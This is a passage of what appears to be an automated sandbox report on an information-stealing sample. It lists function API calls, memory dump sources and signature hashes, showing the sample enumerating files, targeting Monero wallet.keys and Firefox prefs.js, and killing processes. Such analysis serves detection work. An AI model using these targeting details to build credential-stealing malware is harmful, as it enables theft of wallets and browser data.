                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: b86da608b2eec107e75900c6e5f4cf4c130ea0d2c3bbd51b4def4d5d42f7dd9c
                                    • Instruction ID: 3bcd545031feec31253e19da7e2cca83f0f139069694e9f6e8ce71dae097ba41
                                    • Opcode Fuzzy Hash: b86da608b2eec107e75900c6e5f4cf4c130ea0d2c3bbd51b4def4d5d42f7dd9c
                                    • Instruction Fuzzy Hash: 07E10D729112189BDF14FB60DCAAEEE733DAF54300F4045E9B50A62092EF306B89DF95
                                    Function 00CC0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: e27ec7e3633110fd36781ba912bc5d3bec9539f4b21ecf84dad195317a9773c4
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 98E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    Function 00C8F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA16B0,00CA0D97), ref: 00C8F81E
                                    • StrCmpCA.SHLWAPI(?,00CA16B4), ref: 00C8F86F
                                    • StrCmpCA.SHLWAPI(?,00CA16B8), ref: 00C8F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C8FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 652828f14b0b2602fdff9908e5bc9e23036abc1be29a59a1bdff9e05f101e7d2
                                    • Instruction ID: 0717cf581d8bbd25588a41c3c4cd3c314afc38f9f2ea5521a2397435dbe26db7
                                    • Opcode Fuzzy Hash: 652828f14b0b2602fdff9908e5bc9e23036abc1be29a59a1bdff9e05f101e7d2
                                    • Instruction Fuzzy Hash: C1B13172A002189BCF24FF64DD9AEED7379AF54300F0085A8E50A56191EF30AB49DFD6
                                    Function 00C81710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA523C,?,?,?,00CA52E4,?,?,00000000,?,00000000), ref: 00C81963
                                    • StrCmpCA.SHLWAPI(?,00CA538C), ref: 00C819B3
                                    • StrCmpCA.SHLWAPI(?,00CA5434), ref: 00C819C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C81D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C81E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C81E60
                                    • FindClose.KERNEL32(000000FF), ref: 00C81E72
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 2df7575ed96990b267c7fcecf2f83a8c3a1618d0ccedbd51ec0b41fa375d5c9f
                                    • Instruction ID: 92eef65282aa22b216d9a8d12dfdc797be306692d13cc1a6eee390afc928b5b9
                                    • Opcode Fuzzy Hash: 2df7575ed96990b267c7fcecf2f83a8c3a1618d0ccedbd51ec0b41fa375d5c9f
                                    • Instruction Fuzzy Hash: AB12DF71914118ABCF15FB60DCAAEEE737DAF54300F4045E9B50A66091EF306B89DFA1
                                    Function 00C8DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CA0C32), ref: 00C8DF5E
                                    • StrCmpCA.SHLWAPI(?,00CA15C0), ref: 00C8DFAE
                                    • StrCmpCA.SHLWAPI(?,00CA15C4), ref: 00C8DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 00C8E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: c5590d20341a7405bf9990f7b0c88835a4a1a4fab47498d4129da2959cb6e4c0
                                    • Instruction ID: 7ec1f28d5bc3417573e835b91dea5ba9cfb7128af6f1081a085b8bc7942a96cf
                                    • Opcode Fuzzy Hash: c5590d20341a7405bf9990f7b0c88835a4a1a4fab47498d4129da2959cb6e4c0
                                    • Instruction Fuzzy Hash: 06F1CB719141189BCF19FB60CCAAEEE7339BF54300F4045E9A10A62091EF306F88DFA6
                                    Function 00C8DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA15A8,00CA0BAF), ref: 00C8DBEB
                                    • StrCmpCA.SHLWAPI(?,00CA15AC), ref: 00C8DC33
                                    • StrCmpCA.SHLWAPI(?,00CA15B0), ref: 00C8DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8DECC
                                    • FindClose.KERNEL32(000000FF), ref: 00C8DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 3ac309d22cc12defc8d73d12237b11b98356c9debf8a83ec2d91476f9c26b044
                                    • Instruction ID: f7a1b9ceeb6c0ca555739a022380c431b26e3fcf0c3f815cae04470a00ccd496
                                    • Opcode Fuzzy Hash: 3ac309d22cc12defc8d73d12237b11b98356c9debf8a83ec2d91476f9c26b044
                                    • Instruction Fuzzy Hash: A6911572A002089BCF14FB74ED9A9ED737DAF94344F004668F91B56181EE349B48EBD6
                                    Function 00C998E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C99905
                                    • Process32First.KERNEL32(00C89FDE,00000128), ref: 00C99919
                                    • Process32Next.KERNEL32(00C89FDE,00000128), ref: 00C9992E
                                    • StrCmpCA.SHLWAPI(?,00C89FDE), ref: 00C99943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00C99987
                                    • CloseHandle.KERNEL32(00C89FDE), ref: 00C99993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 1b9bb00cbce73dab9783d55f2bf8e1dbe30e405a45a173f2d73c7c4365afff1a
                                    • Instruction ID: 7e3d39a2cc33c4790648dcaf1a4e1d391ffddebe3eca5b2dad531837d120dc0f
                                    • Opcode Fuzzy Hash: 1b9bb00cbce73dab9783d55f2bf8e1dbe30e405a45a173f2d73c7c4365afff1a
                                    • Instruction Fuzzy Hash: 6611EC75A04318ABDB24EFA5EC48BDDB7B9AB49701F0045CCF609A6250DB749B84DF90
                                    Function 00C97D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00CA05B7), ref: 00C97D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C97D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C97D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C97DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00C97EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 6117bb03a3026459c7b7f31782694b89ee235d1f877448e0b8264e2b2a91b527
                                    • Instruction ID: 7d34b12b0401e7e05a3b99831cd1bd68ec1286567f84ef257f161e7376ccc723
                                    • Opcode Fuzzy Hash: 6117bb03a3026459c7b7f31782694b89ee235d1f877448e0b8264e2b2a91b527
                                    • Instruction Fuzzy Hash: DD414B71955218ABCF24DB94DC9DBEEB778FB44700F2042D9E10A66290DB346F84DFA1
                                    Function 00C8E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CA0D79), ref: 00C8E5A2
                                    • StrCmpCA.SHLWAPI(?,00CA15F0), ref: 00C8E5F2
                                    • StrCmpCA.SHLWAPI(?,00CA15F4), ref: 00C8E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
